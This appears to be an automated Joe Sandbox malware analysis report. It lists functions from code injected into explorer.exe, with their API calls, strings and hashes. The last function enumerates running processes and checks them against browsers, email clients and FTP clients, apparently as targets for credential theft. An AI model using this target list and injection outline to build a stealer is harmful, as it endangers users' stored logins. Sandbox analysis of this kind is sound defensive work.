StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00802E75,PathToExe,00000000,00000000), ref: 00801C05
lstrlenW.KERNEL32(00000000,?,00802E75,PathToExe,00000000,00000000), ref: 00801C1C

Strings

.exe, xrefs: 00801BEA

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: lstrlen
String ID: .exe
API String ID: 1659193697-4119554291
Opcode ID: 2319891560d6ae8349903bfa8a49dc9ccb1e09d1e8e345e4dcbfa842e554f50e
Instruction ID: 25c30090c256177ee65ce8713c10069ae55a9220703a854a870b82a5f31c9415
Opcode Fuzzy Hash: 2319891560d6ae8349903bfa8a49dc9ccb1e09d1e8e345e4dcbfa842e554f50e
Instruction Fuzzy Hash: 05F0C2303507209AEBA46F349C49ABB72A4FF01362754482AE042C31E1FB64CC51C759

Function 00802112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00802127
_alldiv.NTDLL(?,?,00989680,00000000), ref: 0080213A
wsprintfA.USER32 ref: 0080214F

Strings

%li, xrefs: 00802149

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
String ID: %li
API String ID: 4120667308-1021419598
Opcode ID: af5c25309bab53230be961eb6bfed6b48a726f71e52bd78f0131e2f528d4b825
Instruction ID: 7a59a6dd9ae686ebcc7dca7803e0333baa2af0ba2397b3d1dd407b331a94e677
Opcode Fuzzy Hash: af5c25309bab53230be961eb6bfed6b48a726f71e52bd78f0131e2f528d4b825
Instruction Fuzzy Hash: 7AE0923268020877D7213BB89C0AEAE7B6CEB40B17F404291F900E2182E5664A6483D6

Function 00812FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000018), ref: 0081316F
_allmul.NTDLL(-00000001,00000000,?,?), ref: 008131D2
_alldiv.NTDLL(?,?,00000000), ref: 008132DE
_allmul.NTDLL(00000000,?,00000000), ref: 008132E7
_allmul.NTDLL(?,00000000,?,?), ref: 00813392

Part of subcall function 008116CD: memset.NTDLL ref: 0081172B

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: _allmul$_alldivmemset
String ID:
API String ID: 3880648599-0
Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction ID: a1b736f6a898ee662a756ca86d49af69c2a60abc095481ab3ecc996ea048d4c7
Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction Fuzzy Hash: 11D185706083459BDB24DF69C880BAABBE9FF88704F14482DF995C3251DB70DE85CB96

Function 008387FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON

Download Yara Rule

Strings

old, xrefs: 0083889E
FOREIGN KEY constraint failed, xrefs: 00838AC8
new, xrefs: 008388AA

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID:
String ID: FOREIGN KEY constraint failed$new$old
API String ID: 0-384346570
Opcode ID: 62d909c51362ee42d50e22314f6885cb04adda19405aa5e607a358688fccb6a1
Instruction ID: 59ded2e66b21c8d2574fc80a2d8023c216a8f4c25f0ef40f4d617cf82bd42e86
Opcode Fuzzy Hash: 62d909c51362ee42d50e22314f6885cb04adda19405aa5e607a358688fccb6a1
Instruction Fuzzy Hash: 40D118B06083109FD718DB289881A2EBBE9FFC8754F10492EF945CB291DB74D985CB93

Function 008096BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 008096E7
_alldiv.NTDLL(00000000,80000000,?,?), ref: 00809707
_alldiv.NTDLL(00000000,80000000,?,?), ref: 00809739
_alldiv.NTDLL(00000001,80000000,?,?), ref: 0080976C
_allmul.NTDLL(?,?,?,?), ref: 00809798

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: _alldiv$_allmul
String ID:
API String ID: 4215241517-0
Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction ID: de40854899cd3d37dc2c7ddbc8f61d881b39d64d86c41a8e44dc7eb73cd86dcc
Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction Fuzzy Hash: 6421F6331197595AD7F45D1D8CD0B2B7588FBA1791F24412DFDE1C22E3E9538C4180A3

Function 0081B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000), ref: 0081B1B3
_alldvrm.NTDLL(?,?,00000000), ref: 0081B20F
_allrem.NTDLL(?,00000000,?,?), ref: 0081B28A
memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0081B298

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: _alldvrm_allmul_allremmemcpy
String ID:
API String ID: 1484705121-0
Opcode ID: c4620565b238e791998deca626faa87058b35ed992642f4a5543c7c8c5223a07
Instruction ID: 5e6abe4f50808426877635e2517c678d305630f6ecd5c8390d3a1a1a49bfeed5
Opcode Fuzzy Hash: c4620565b238e791998deca626faa87058b35ed992642f4a5543c7c8c5223a07
Instruction Fuzzy Hash: E04117756083419BC714EF29C89196AB7E9FFC8300F05492DF995C7262DB71EC89CB52

Function 00801895 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.COMBASE(?,?), ref: 008018A7
GlobalLock.KERNEL32(00804B57), ref: 008018B6
GlobalUnlock.KERNEL32(?), ref: 008018F4

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 008018E8

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
String ID:
API String ID: 1688112647-0
Opcode ID: 30157b0702a9d86656cbeb8881ca883d6023877af37d8b7c2342b84ffb4c0806
Instruction ID: d63013e14191d3c99785bf8e5e9cf03e141463606cedaeab7ee09fce76eb1472
Opcode Fuzzy Hash: 30157b0702a9d86656cbeb8881ca883d6023877af37d8b7c2342b84ffb4c0806
Instruction Fuzzy Hash: 41014F75200706AFCF515F29DC1885B7BA9FF94762B40853EF455C3291EF35C9149A21

Function 00801953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 4f0198826b9a6e5873553d7870f89c250e563e814cdd64c38788e050945f7662
Instruction ID: 9f30bd0d24809c788b1713e6f0d32558c1753866ba79e6b5c276e1497be861ab
Opcode Fuzzy Hash: 4f0198826b9a6e5873553d7870f89c250e563e814cdd64c38788e050945f7662
Instruction Fuzzy Hash: C8E0656230021C1B8B5477AE5C94D7B7B9CEAD96B67450039FA04D3352F9569C0946B0

Function 0082F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00806A81: memset.NTDLL ref: 00806A9C

_aulldiv.NTDLL(?,00000000,?,00000000), ref: 0082F2A1

Strings

%llu, xrefs: 0082F25E
%llu, xrefs: 0082F2A8

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: _aulldivmemset
String ID: %llu$%llu
API String ID: 714058258-4283164361
Opcode ID: f3e6cf8cf4a44043417112f12cce710aa4f3914f0da74d43ba0499e00d845502
Instruction ID: 4425d9313b8e7acb329932681837d566ba10723a21ad3426923128a736024bdd
Opcode Fuzzy Hash: f3e6cf8cf4a44043417112f12cce710aa4f3914f0da74d43ba0499e00d845502
Instruction Fuzzy Hash: 0721F971A44615ABC710AA28DC42F6B7768FF81730F054238F961D76C2EB25EC65C7E2

Function 0081203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,?), ref: 00812174
_allmul.NTDLL(?,?,?,00000000), ref: 0081220E
_allmul.NTDLL(?,00000000,00000000,?), ref: 00812241
_allmul.NTDLL(00802E26,00000000,?,?), ref: 00812295

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: _allmul
String ID:
API String ID: 4029198491-0
Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction ID: 810a19088e8b612db92e16117107c33d8c2b777d8e2865f8e77ccb7b77328410
Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction Fuzzy Hash: B1A149706087059BDB14EE68C891AAEB7EAFFD8704F00492DF655C7361EB70EC958B42

Function 008178B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?), ref: 00817979
memset.NTDLL ref: 0081798A
memcpy.NTDLL(?,?,?), ref: 00817A00
memset.NTDLL ref: 00817A14

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 2eef65d14c9d0fd15180a28409a4d0039cf55ea0b4bc81846a5499eb8e68c88a
Instruction ID: 84630c16cdf71e0985daefe9d550ae7af7bfdfdc40e02253bc5159ffd311c8fc
Opcode Fuzzy Hash: 2eef65d14c9d0fd15180a28409a4d0039cf55ea0b4bc81846a5499eb8e68c88a
Instruction Fuzzy Hash: 8881707160C3149FC350DF28C880A6BBBE9FF88714F14496DF886D7252E674E989CB92

Function 0080190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000000,00802783), ref: 0080192B
lstrlen.KERNEL32(00000000,?,?,?,00000000,00802783), ref: 00801930
lstrcat.KERNEL32(00000000,?), ref: 00801946
lstrcat.KERNEL32(00000000,00000000), ref: 0080194A

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 399bb3d0a45afa028bc983ac2631141ca291c4dfb8a24463543a13690187a454
Instruction ID: 8e2d49e670b9c7a5e8717a9d51e1767434e012141638409b9e12fea4ac2a38e1
Opcode Fuzzy Hash: 399bb3d0a45afa028bc983ac2631141ca291c4dfb8a24463543a13690187a454
Instruction Fuzzy Hash: D2E09B5630071C1B4B6177AE5C98D7B7ADCEAD56B63450135FE04D3302FD559C0546B0

Analysis Process: explorer.exePID: 4900, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	21.6%
Dynamic/Decrypted Code Coverage:	87.3%
Signature Coverage:	0%
Total number of Nodes:	181
Total number of Limit Nodes:	17

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00C830A8 Relevance: 4.7, APIs: 3, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00C83104
FindNextFileW.KERNELBASE ref: 00C83218
FindClose.KERNELBASE ref: 00C83229

Memory Dump Source

Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c81000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction ID: 05935552a3ff1a14137138a0a171885961879fb3d4e079bf22016127bf345762
Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction Fuzzy Hash: 46418E30318B4C4FDB94FB29C85D7AE73E2FBD8744F444A29A44AC3191EE789A049785

Function 00C838B0 Relevance: 1.5, APIs: 1, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00C838F2

Memory Dump Source

Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c81000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction ID: e7b4b2e1541a4b3b6656855c802356f1b18e33de9afd4a155206f91717b856fb
Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction Fuzzy Hash: 51F0E520F11A481BEFAC77BD685D33822C4EB98319F50052AF925D32D2DC3D8E468305

Function 00C82774 Relevance: 6.1, APIs: 4, Instructions: 124
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE ref: 00C827C7
RegQueryValueExW.KERNELBASE ref: 00C827F4
RegQueryValueExW.KERNELBASE ref: 00C8283A
RegCloseKey.KERNELBASE ref: 00C82860

Part of subcall function 00C81860: RtlFreeHeap.NTDLL ref: 00C81880

Memory Dump Source

Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c81000_explorer.jbxd

Similarity

API ID: QueryValue$CloseFreeHeapOpen
String ID:
API String ID: 1641618270-0
Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction ID: 93865ebf3214341639852e107a90062fd4af1e1ec085253854fe507745b3aa3d
Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction Fuzzy Hash: 9A31C83120CB488FEB58EF29D44C77A77D0FBA8359F04062EE49AC22A4DF24C9428746

Function 00C8372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE ref: 00C837B2
RegCloseKey.KERNELBASE ref: 00C837C1

Strings

?, xrefs: 00C837A2

Memory Dump Source

Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c81000_explorer.jbxd

Similarity

API ID: CloseCreate
String ID: ?
API String ID: 2932200918-1684325040
Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction ID: ea0a0fe013410949537e1aadf2e33327bbca5da43bcdc54b5bcfa699e198478d
Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction Fuzzy Hash: 1B119070608B488FD751EF29D48866AB7E1FB98305F40062EF48AC3260DF38D985CB82

Function 00C8A298 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00C8A397
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00C8A441
VirtualProtect.KERNELBASE ref: 00C8A45F

Memory Dump Source

Source File: 0000000E.00000002.2666348023.0000000000C89000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C89000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c89000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction ID: 98cd08000ba281231d058f246dd764af94d6388f7cd5b474216f00dc28c81328
Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction Fuzzy Hash: 0051673235891D4BEB24BB7C98C43F5B3C1F759329B18062BC4AAC3295E559D946838B

Function 00C83254 Relevance: 4.7, APIs: 3, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C8298C: GetFileAttributesW.KERNELBASE ref: 00C8299E

GetPrivateProfileSectionNamesW.KERNEL32 ref: 00C8330F
GetPrivateProfileStringW.KERNEL32 ref: 00C8336F
GetPrivateProfileIntW.KERNEL32 ref: 00C8338C

Part of subcall function 00C830A8: FindFirstFileW.KERNELBASE ref: 00C83104

Part of subcall function 00C81860: RtlFreeHeap.NTDLL ref: 00C81880

Memory Dump Source

Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c81000_explorer.jbxd

Similarity

API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
String ID:
API String ID: 970345848-0
Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction ID: 7adebeabff05388cc167fe26a10099114287284710af07c0d84e3c6d53fecf2a
Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction Fuzzy Hash: FE51ED30718F494FDB59BB2D981A67D33D2EBD8704B44057DE40AC3296EE64DE42938E

Function 00C83458 Relevance: 4.7, APIs: 3, Instructions: 172
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE ref: 00C8347E
RegOpenKeyExW.KERNELBASE ref: 00C8353F
RegEnumKeyExW.KERNELBASE ref: 00C835D6

Part of subcall function 00C82774: RegOpenKeyExW.KERNELBASE ref: 00C827C7
Part of subcall function 00C82774: RegQueryValueExW.KERNELBASE ref: 00C827F4
Part of subcall function 00C82774: RegQueryValueExW.KERNELBASE ref: 00C8283A
Part of subcall function 00C82774: RegCloseKey.KERNELBASE ref: 00C82860

Part of subcall function 00C83254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00C8330F

Part of subcall function 00C81860: RtlFreeHeap.NTDLL ref: 00C81880

Memory Dump Source

Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c81000_explorer.jbxd

Similarity

API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
String ID:
API String ID: 1841478724-0
Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction ID: 610aadcaf060cfbb709746bc3cdbd77630626d3d52774a674ddd72c35203efa7
Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction Fuzzy Hash: 48416930718B484FDB98FF6D889972AB6E2FBD8744F04056EA44EC32A1DE34DD058B46

Function 00C82938 Relevance: 3.0, APIs: 2, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00C82966
CloseHandle.KERNELBASE ref: 00C8297A

Memory Dump Source

Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c81000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction ID: 5ac6f6efb32412baa6a3f323687267149ec96977ab28e42bf2563896c7d9da3a
Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction Fuzzy Hash: 44F0657021571A4FE7547FB9449C336B5D0FB48359F18463DE46AC23D0D73589468746

Function 00C822B4 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE ref: 00C822D0

Memory Dump Source

Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c81000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction ID: 4225217ab70f82292582b09a09c14aa1c7f99a20a1510b023ae38c9d464991c6
Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction Fuzzy Hash: ABE08C30108B0A8FD758AFBCE4CA07933A1EB9C256B05053EE005CB114D27988C18741

Function 00C8298C Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE ref: 00C8299E

Memory Dump Source

Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c81000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction ID: 02b82b8282a68ba7312323f78c02a56c8e6c2b475f0a8d6345478d32406fb843
Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction Fuzzy Hash: 8FD0A732732915277B6436FA08DD27130A0D71932EF14033AEA36C11E0E285CED5A309

Function 00C81860 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL ref: 00C81880

Memory Dump Source

Source File: 0000000E.00000002.2666348023.0000000000C81000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c81000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction ID: c95484c46c8330658312d3cb68c26ba8135e1b940de0757f73a52d1021f85e3a
Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction Fuzzy Hash: 9DD02220712A040BEF2CBBFA1C8E1747AD6E758216B0C8020BC28C3291DD39C886C305

Analysis Process: explorer.exePID: 2176, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	97.4%
Signature Coverage:	27.5%
Total number of Nodes:	306
Total number of Limit Nodes:	42

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 034A1016 Relevance: 87.7, APIs: 30, Strings: 20, Instructions: 244
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 034A2608: VirtualQuery.KERNEL32(034A4434,?,0000001C), ref: 034A2615

Part of subcall function 034A2861: GetProcessHeap.KERNEL32(00000008,0000A000,034A10CC), ref: 034A2864
Part of subcall function 034A2861: RtlAllocateHeap.NTDLL(00000000), ref: 034A286B

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 034A1038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 034A106B
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 034A1074
GetCurrentProcessId.KERNEL32(?,034A1010), ref: 034A107A
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 034A10DF
Process32First.KERNEL32(00000000,?), ref: 034A10FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 034A111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 034A112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 034A1142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 034A1156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 034A1166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 034A117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 034A118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 034A11A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 034A11B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 034A11CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 034A11DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 034A11F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 034A1206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 034A1216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 034A1226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 034A1236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 034A1246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 034A1256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 034A1266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 034A1276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 034A12B4
Process32Next.KERNEL32(00000000,00000128), ref: 034A130B
CloseHandle.KERNELBASE(00000000), ref: 034A131C
Sleep.KERNELBASE(000003E8), ref: 034A1327

Strings

thebat32.exe, xrefs: 034A1198
mailchat.exe, xrefs: 034A126C
smartftp.exe, xrefs: 034A11E8
outlook.exe, xrefs: 034A1170
flashfxp.exe, xrefs: 034A120C
winscp.exe, xrefs: 034A11FC
chrome.exe, xrefs: 034A1138
foxmail.exe, xrefs: 034A124C
alimail.exe, xrefs: 034A125C
firefox.exe, xrefs: 034A1114
microsoftedgecp.exe, xrefs: 034A10D2, 034A1160, 034A12AE
263em.exe, xrefs: 034A123C
iexplore.exe, xrefs: 034A1124
thunderbird.exe, xrefs: 034A11C0
thebat.exe, xrefs: 034A1184
cuteftppro.exe, xrefs: 034A121C
mailmaster.exe, xrefs: 034A122C
filezilla.exe, xrefs: 034A11D4
thebat64.exe, xrefs: 034A11AC
opera.exe, xrefs: 034A114C

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

